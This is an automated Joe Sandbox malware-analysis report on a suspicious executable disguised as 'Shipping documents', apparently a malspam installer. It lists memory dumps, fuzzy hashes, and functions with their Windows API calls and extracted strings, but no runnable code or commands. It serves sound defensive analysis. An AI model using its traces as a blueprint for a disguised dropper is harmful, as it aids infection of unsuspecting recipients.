Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19

Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
Instruction ID: 6bbe31101158ed697117799215e52ff0bd2f9d85eb69b818a49c661f2cf41376
Opcode Fuzzy Hash: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
Instruction Fuzzy Hash: BCE08630841204BBDB00AFA0CD49DEE3B78EF11340F10443AF540BB0D1E7F89580975A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

, xrefs: 004050C7
N, xrefs: 00404D99
M, xrefs: 00404CB8

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,Call), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

Call, xrefs: 00404729, 0040472E, 00404739
A, xrefs: 004046EB
C:\Users\user\Uploadable\normallnnens, xrefs: 00404718
4Te, xrefs: 004045CE

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: 4Te$A$C:\Users\user\Uploadable\normallnnens$Call
API String ID: 2246997448-2930822779
Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\Uploadable\normallnnens
API String ID: 542301482-2478767733
Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

AB@, xrefs: 004044D6
Call, xrefs: 004044A7
N, xrefs: 00404466
open, xrefs: 004044D9
4Te, xrefs: 00404426

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: 4Te$AB@$Call$N$open
API String ID: 3615053054-1531013243
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

p]B, xrefs: 00405C0B
[Rename], xrefs: 00405CE8, 00405CFA
peB, xrefs: 00405C55
NUL, xrefs: 00405C10
%ls=%ls, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
